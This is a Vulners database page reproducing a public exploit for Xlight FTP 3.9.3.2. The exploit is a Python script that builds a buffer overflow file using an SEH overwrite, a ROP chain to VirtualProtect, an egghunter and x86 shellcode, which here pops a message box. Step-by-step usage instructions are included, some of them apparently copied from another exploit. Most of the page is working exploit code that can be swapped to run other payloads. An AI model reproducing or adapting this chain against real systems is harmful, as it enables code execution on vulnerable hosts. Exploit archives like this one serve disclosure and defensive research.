Vulners
Lucene search
Xlight FTP 3.9.3.2 Buffer Overflow Exploit
# Exploit Title: Xlight FTP v3.9.3.2 - Buffer Overflow (SEH Egghunter + ROP)
# Exploit Author: Hejap Zairy
# Software Link: http://www.xlightftpd.com/download/setup.exe
# Tested Version: v3.9.3.2(2022-1-5)
# Tested on: Windows 10 64bit
# 1.- Run python code : 0day-Hejap_Zairy.py
# 2.- Open 0day_Hejap.txt and copy All content to Clipboard
# 3.- Open Audio Conversion Wizard and press Enter Code
# 5.- Click 'Server ip ' -> 'General' -> 'Advanced' -> 'Excute a program after user logged in ' -> 'Setup'
# 6.- Crashed
# Author Code By Hejap Zairy
#!/usr/bin/env python
# Auther Hejap Zairy
#!/usr/bin/env python
import struct
##================================================================================
## 2022-03-12 16:54:06
##================================================================================
##-----------------------------------------------------------------------------------------------------------------------------------------
## Module info :
##-----------------------------------------------------------------------------------------------------------------------------------------
## Base | Top | Size | Rebase | SafeSEH | ASLR | NXCompat | OS Dll | Version, Modulename & Path
##-----------------------------------------------------------------------------------------------------------------------------------------
## 0x76aa0000 | 0x76ae4000 | 0x00044000 | True | True | True | False | True | 10.0.17763.1 [SHLWAPI.dll] (C:\Windows\System32\SHLWAPI.dll)
## 0x76970000 | 0x76a93000 | 0x00123000 | True | True | True | False | True | 10.0.17763.1490 [ucrtbase.dll] (C:\Windows\System32\ucrtbase.dll)
## 0x766a0000 | 0x766bc000 | 0x0001c000 | True | True | True | False | True | 10.0.17763.1075 [profapi.dll] (C:\Windows\System32\profapi.dll)
## 0x76340000 | 0x763c0000 | 0x00080000 | True | True | True | False | True | 10.0.17763.1 [msvcp_win.dll] (C:\Windows\System32\msvcp_win.dll)
## 0x75680000 | 0x757ea000 | 0x0016a000 | True | True | True | False | True | 10.0.17763.1879 [gdi32full.dll] (C:\Windows\System32\gdi32full.dll)
## 0x75a60000 | 0x75bfe000 | 0x0019e000 | True | True | True | False | True | 10.0.17763.1 [CRYPT32.dll] (C:\Windows\System32\CRYPT32.dll)
## 0x74ff0000 | 0x74fff000 | 0x0000f000 | True | True | True | False | True | 10.0.17763.1 [kernel.appcore.dll] (C:\Windows\System32\kernel.appcore.dll)
## 0x00400000 | 0x006d5000 | 0x002d5000 | False | False | False | False | False | 3.9.3.2 [xlight.exe] (C:\Users\Tarnished\Desktop\Xlight\xlight.exe)
## 0x74870000 | 0x74909000 | 0x00099000 | True | True | True | False | True | 10.0.17763.1075 [ODBC32.dll] (C:\Windows\SYSTEM32\ODBC32.dll)
## 0x74b20000 | 0x74bbc000 | 0x0009c000 | True | True | True | False | True | 10.0.17763.1 [apphelp.dll] (C:\Windows\SYSTEM32\apphelp.dll)
## 0x76280000 | 0x76297000 | 0x00017000 | True | True | True | False | True | 10.0.17763.1 [win32u.dll] (C:\Windows\System32\win32u.dll)
## 0x75c50000 | 0x761a6000 | 0x00556000 | True | True | True | False | True | 10.0.17763.1911 [SHELL32.dll] (C:\Windows\System32\SHELL32.dll)
##0x006d4270 : kernel32.loadlibrarya | 0x76ce2280 | startnull,asciiprint,ascii,alphanum {PAGE_READWRITE} [xlight.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v3.9.3.2 (C:\Users\Tarnished\Desktop\Xlight\xlight.exe)
##0x006d4258 : comdlg32.getopenfilenamea | 0x77226240 | startnull,asciiprint,ascii,alphanum {PAGE_READWRITE} [xlight.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v3.9.3.2 (C:\Users\Tarnished\Desktop\Xlight\xlight.exe)
##0x006d427c : kernel32.virtualprotect | 0x76ce0c10 | startnull,asciiprint,ascii {PAGE_READWRITE} [xlight.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v3.9.3.2 (C:\Users\Tarnished\Desktop\Xlight\xlight.exe)
##0x006d4278 : kernel32.getprocaddress | 0x76ce05a0 | startnull,asciiprint,ascii,alphanum {PAGE_READWRITE} [xlight.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v3.9.3.2 (C:\Users\Tarnished\Desktop\Xlight\xlight.exe)
# RopFunc syscall null
badchars = [0x00,0x0a,0x0d,0x3a,0xff]
buf = b""
buf += b"\xd9\xeb\x9b\xd9\x74\x24\xf4\x31\xd2\xb2\x77\x31\xc9"
buf += b"\x64\x8b\x71\x30\x8b\x76\x0c\x8b\x76\x1c\x8b\x46\x08"
buf += b"\x8b\x7e\x20\x8b\x36\x38\x4f\x18\x75\xf3\x59\x01\xd1"
buf += b"\xff\xe1\x60\x8b\x6c\x24\x24\x8b\x45\x3c\x8b\x54\x28"
buf += b"\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x34"
buf += b"\x49\x8b\x34\x8b\x01\xee\x31\xff\x31\xc0\xfc\xac\x84"
buf += b"\xc0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb\xf4\x3b\x7c\x24"
buf += b"\x28\x75\xe1\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b\x8b"
buf += b"\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\x89\x44\x24\x1c"
buf += b"\x61\xc3\xb2\x08\x29\xd4\x89\xe5\x89\xc2\x68\x8e\x4e"
buf += b"\x0e\xec\x52\xe8\x9f\xff\xff\xff\x89\x45\x04\xbb\xef"
buf += b"\xce\xe0\x60\x87\x1c\x24\x52\xe8\x8e\xff\xff\xff\x89"
buf += b"\x45\x08\x68\x6c\x6c\x20\x41\x68\x33\x32\x2e\x64\x68"
buf += b"\x75\x73\x65\x72\x30\xdb\x88\x5c\x24\x0a\x89\xe6\x56"
buf += b"\xff\x55\x04\x89\xc2\x50\xbb\xa8\xa2\x4d\xbc\x87\x1c"
buf += b"\x24\x52\xe8\x5f\xff\xff\xff\x68\x6f\x78\x58\x20\x68"
buf += b"\x61\x67\x65\x42\x68\x4d\x65\x73\x73\x31\xdb\x88\x5c"
buf += b"\x24\x0a\x89\xe3\x68\x58\x20\x20\x20\x68\x61\x69\x72"
buf += b"\x79\x68\x61\x70\x20\x5a\x68\x20\x48\x65\x6a\x68\x30"
buf += b"\x64\x61\x79\x31\xc9\x88\x4c\x24\x10\x89\xe1\x31\xd2"
buf += b"\x52\x53\x51\x52\xff\xd0\x31\xc0\x50\xff\x55\x08"
def Hejap_rop_chain():
Hejap_gadgets = [
0x75c4f468, # POP EBX # RETN [windows.storage.dll] ** REBASED ** ASLR
0x7731c2a0, # ptr to &VirtualProtect() [IAT CRYPT32.dll] ** REBASED ** ASLR
0x75deb176, # MOV ESI,DWORD PTR DS:[EBX] # RETN [windows.storage.dll] ** REBASED ** ASLR
#[---INFO:gadgets_to_set_ebp:---]
0x7545eebb, # POP EBP # RETN [SHLWAPI.dll] ** REBASED ** ASLR
0x75ff2bdb, # & call esp [msvcp_win.dll] ** REBASED ** ASLR
#[---INFO:gadgets_to_set_ebx:---]
0x755d53b2, # POP EAX # RETN [KERNELBASE.dll] ** REBASED ** ASLR
0xfffffdff, # Value to negate, will become 0x00000201
0x74d241d7, # NEG EAX # RETN [USER32.dll] ** REBASED ** ASLR
0x75e72ff1, # XCHG EAX,EBX # RETN [windows.storage.dll] ** REBASED ** ASLR
#[---INFO:gadgets_to_set_edx:---]
0x765a2dad, # POP EAX # RETN [bcryptPrimitives.dll] ** REBASED ** ASLR
0xffffffc0, # Value to negate, will become 0x00000040
0x75297b65, # NEG EAX # RETN [gdi32full.dll] ** REBASED ** ASLR
0x76a3b05a, # XCHG EAX,EDX # RETN [SHELL32.dll] ** REBASED ** ASLR
#[---INFO:gadgets_to_set_ecx:---]
0x72bb29ef, # POP ECX # RETN [UXTHEME.DLL] ** REBASED ** ASLR
0x7774f16b, # &Writable location [ntdll.dll] ** REBASED ** ASLR
#[---INFO:gadgets_to_set_edi:---]
0x77275d3d, # POP EDI # RETN [CRYPT32.dll] ** REBASED ** ASLR
0x75849686, # RETN (ROP NOP) [KERNEL32.DLL] ** REBASED ** ASLR
#[---INFO:gadgets_to_set_eax:---]
0x72bf2465, # POP EAX # RETN [UXTHEME.DLL] ** REBASED ** ASLR
0x90909090, # nop
#[---INFO:pushad:---]
0x76a37959, # PUSHAD # RETN [SHELL32.dll] ** REBASED ** ASLR
]
return ''.join(struct.pack('<I', _) for _ in Hejap_gadgets)
egg = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
egg+="\xef\xb8\x68\x30\x30\x70\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
rop_chain = Hejap_rop_chain()
offset = 452
nseh = "\x90" * 4
junk = "A" * (offset - len(nseh))
stackpivot = struct.pack('<I', 0x8e648b26 ) # POP ESP # POP EBP # RETN ** [xlight.exe
#seh = struct.pack('<I', 0x0019ccb8 ) null
buffer = junk + nseh + stackpivot + rop_chain + "\x90" * 5 + egg + 'h00ph00p' + buf + "\x90" * (1000 - len(egg)-len(stackpivot))
f = open("0day_hejap.txt", "w")
f.write(buffer)
f.close()
# Proof and Exploit:
https://i.imgur.com/jMURHQF.png
https://i.imgur.com/aw6hZo2.png
#Video
https://streamable.com/gmqz5x
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
23 Mar 2022 00:00Current
0.1Low risk
Vulners AI Score0.1